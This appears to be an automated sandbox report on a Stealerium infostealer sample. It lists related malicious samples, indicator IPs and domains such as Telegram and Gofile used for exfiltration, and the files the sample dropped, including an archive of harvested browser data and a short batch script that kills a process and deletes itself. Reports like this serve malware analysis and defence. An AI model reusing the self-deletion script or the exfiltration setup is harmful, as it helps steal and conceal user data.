	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse
	nYkkZZbAIR.exe	Get hash	malicious	Stealerium	Browse
	MICROCHIP QFP3 22 - 25000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	AWB8674109965.html	Get hash	malicious	HTMLPhisher	Browse
	INQUIRY_pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
104.16.184.241	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	icanhazip.com/
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	vbe11TPn2x.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	zufmUwylvo.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	icanhazip.com/
	gGcpYEOr8U.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	GsZkXAmf61.exe	Get hash	malicious	Celestial Rat	Browse	icanhazip.com/
	mitec_purchase_order_PDF (1).vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.gofile.io	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	45.112.123.126
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	45.112.123.126
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	45.112.123.126
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	45.112.123.126
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	45.112.123.126
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	45.112.123.126
	MayitaV16.exe	Get hash	malicious	Unknown	Browse	45.112.123.126
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	45.112.123.126
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	45.112.123.126
	iDvmIRCPBw.exe	Get hash	malicious	Unknown	Browse	45.112.123.126
szurubooru.zulipchat.com	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	44.208.10.127
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	52.20.41.38
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	3.210.246.148
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	50.17.0.11
raw.githubusercontent.com	TXj1ICMUqd.exe	Get hash	malicious	Stealerium	Browse	185.199.109.133
	0b3SUiWz3y.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.111.133
	cY6HT7CeBF.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
api.telegram.org	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	8FloezlGW7.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	149.154.167.220
	nYkkZZbAIR.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	MICROCHIP QFP3 22 - 25000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	AWB8674109965.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	INQUIRY_pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	8FloezlGW7.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	149.154.167.220
	nYkkZZbAIR.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	MICROCHIP QFP3 22 - 25000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	file.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	https://docs.zoom.us/doc/nOwDrP_BRFeNjNel8fAbXg	Get hash	malicious	Unknown	Browse	104.18.95.41
	LBswoftSFF.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	3lpDhNtVKt.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
FASTLYUS	TXj1ICMUqd.exe	Get hash	malicious	Stealerium	Browse	185.199.109.133
	0b3SUiWz3y.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.111.133
	cY6HT7CeBF.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	185.199.108.133

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	TXj1ICMUqd.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	https://aysesuretobea.com/	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	cY6HT7CeBF.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	cY6HT7CeBF.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	lka01EskGw.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	ELsb0Wg55V.exe	Get hash	malicious	DcRat	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148
	lka01EskGw.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220 45.112.123.126 31.14.70.244 3.210.246.148

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	153
Entropy (8bit):	5.407395483816817
Encrypted:	false
SSDEEP:	3:HFTulK1shFivqII2STtv/K025PUkh4E2J5xAImFvUsDompACGTd8r6yn:sgfvqN2SZX2P923fxqpLECzn
MD5:	50B86BB1BD107A9D17E77B84EE660B74
SHA1:	A2D069663D9C686B1D0B12F8D1F78063BC7809AE
SHA-256:	DADE931DAD12AFD38741CA02C37FF990F62A9167DDEA183D9DA52CB0EA65DBDE
SHA-512:	1448221DD223C33E64022B94ADE812A92E593B17A5F96E95D0AE4DA2D1C189E44B1DAFEB86022AB0263EAF549FA857E4EFE9E37727264F30A9B0F024AD08D7BA
Malicious:	false
Preview:	chcp 65001..taskkill /F /PID 5276..timeout /T 2 /NOBREAK > NUL..del /F /Q "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat"..

C:\Users\user\AppData\Local\Temp\tmp2097.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20C7.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCCC0.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCCD1.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCCF1.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCD12.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE283.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE2A3.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE2C4.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE304.tmp.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH.zip

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	118332
Entropy (8bit):	7.9385951373386545
Encrypted:	false
SSDEEP:	3072:FfZdR/1sYeIeLFoUSg/e2Be75m/RZfUyYQtHmbfT:FfEEPUjW2B+58RZsIir
MD5:	0DBE52EBC0433A2341768CAF9F26ABF0
SHA1:	893AC3F57E3409ECDC15F60BE71B1FC13B56823B
SHA-256:	66F3B0003FAB1219AEAE3055A8444030B639253B806D116950BFE791BCA8A7C5
SHA-512:	62DAD198B083D5633FF06310A6D64210505B018FD8F4B37D4013F3C62D17244B44EDA5C9085F10B6CEFAA4EE4B893D2CCDD0B5F662C1B3C0472D0F1423CA646C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH.zip, Author: Joe Security
Preview:	PK.........3}Y................Browsers/Edge/History.txt..GQ......\PK.........3}Yq.C]t...........Browsers/Firefox/Bookmarks.txt.X^^ 6.h...nb..._2V../tpJ.S.}....@F...f..#..L\|...'~N.&i.,..d..L...I..D..$PH..:..??..mm."9.E.!.........i.9.}..PK..q.C]t.......PK.........3}Y...sl...^.......Browsers/Firefox/History.txt.:d.{.6.0.....3..4...&....U.......{%.Uk...J.gA-....($P.'.L..U..;(:v...m,.}7z...8..l.1&9......5!B!....IG..PK.....sl...^...PK.........3}Y................Browsers/Google/Downloads.txt.,..9...#uW.PK.........3}Y................Browsers/Google/History.txtM.&.......NPK.........3}Y`T.....5.......Directories/Desktop.txt..".K....}f.#....?9.Y.~.V.\....rV.8..'.F...v.[..-X=..(.i.1.!...E'.....$.$"ba.\.........u.)x..+.q.#.T4....II...M.hZ...:.......\|..J.C.....{I...\`..a"..F~l..W....c/.....7\W..!...M.M.;8...\P.!a!...........)...@...q8.A.8\|.........V.1.3l...H../a\|u.;..~2..h..[n:O.PK..`T.....5...PK.........3}Y..j.0...........Directories/Documents.txt>.@..i..j........1...a

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	220
Entropy (8bit):	4.546534105739819
Encrypted:	false
SSDEEP:	6:Kw5FBeKjMnf3eKj5ZKMeKjYLC/eKjtyRE2YReK3:KCBH4n/HHKMHsL0HMRE2uH3
MD5:	2AB1FD921B6C195114E506007BA9FE05
SHA1:	90033C6EE56461CA959482C9692CF6CFB6C5C6AF
SHA-256:	C79CFDD6D0757EB52FBB021E7F0DA1A2A8F1DD81DCD3A4E62239778545A09ECC
SHA-512:	4F0570D7C7762ECB4DCF3171AE67DA3C56AA044419695E5A05F318E550F1A910A616F5691B15ABFE831B654718EC97A534914BD172AA7A963609EBD8E1FAE0A5
Malicious:	false
Preview:	Title: Get Help.URL: (No URL provided)..Title: Customize Firefox.URL: (No URL provided)..Title: Get Involved.URL: (No URL provided)..Title: About Us.URL: (No URL provided)..Title: Getting Started.URL: (No URL provided)..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.890995272476094
Encrypted:	false
SSDEEP:	3:qtNRROrSLvIJiMhKVX3L2WdXOfZiGPHA9lfMJJEv:MeGLciA8dXwZiG/CF0Ev
MD5:	A72509876646BC379E1D8C3B895ED0ED
SHA1:	2F270C6A8E07FA7FEE8C07A1FD100474A9A513A8
SHA-256:	8BF712CABAC55E09FF74348817A29572826688AE4AB516848FE882BC5DEF91E7
SHA-512:	FDCB7BB82C0AF434610311D7B12EB2D6AEF7ADB8B040EBA97D3F115C18810799EEDC02B39AF6992C15552568B5BC799889CC185191D5E783DEB82DC98946A5EB
Malicious:	false
Preview:	URL: https://www.mozilla.org/en-US/privacy/firefox/.Title: Firefox Privacy Notice . Mozilla.

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	565
Entropy (8bit):	5.256245729043249
Encrypted:	false
SSDEEP:	12:wvFJCmByDLDrGnQ0QqV2uV45z/SvO/uxNIixWn094kiOLKdPTCrSv3/wXxxMFWu9:CBMXGn/ROp/SvO2YixWMedPKsPgxqFWo
MD5:	0A7B094A650CE4CBC9C57BA44E0FDDAC
SHA1:	D29612A307E671CD0624E68F07A3E3D9AD2E3C71
SHA-256:	F4686AA8D87F18A9653CC0088767D7ED2738C2BE44BDE658FB56E29F0C819050
SHA-512:	BA2E048B8F857C3B3035BD004495F8688B45242A22AA086E98C04E310D8BE71E732A327E0B68B54E20A01A022C2462AC946D35354A7FA4CB7FB8E5563A60683E
Malicious:	false
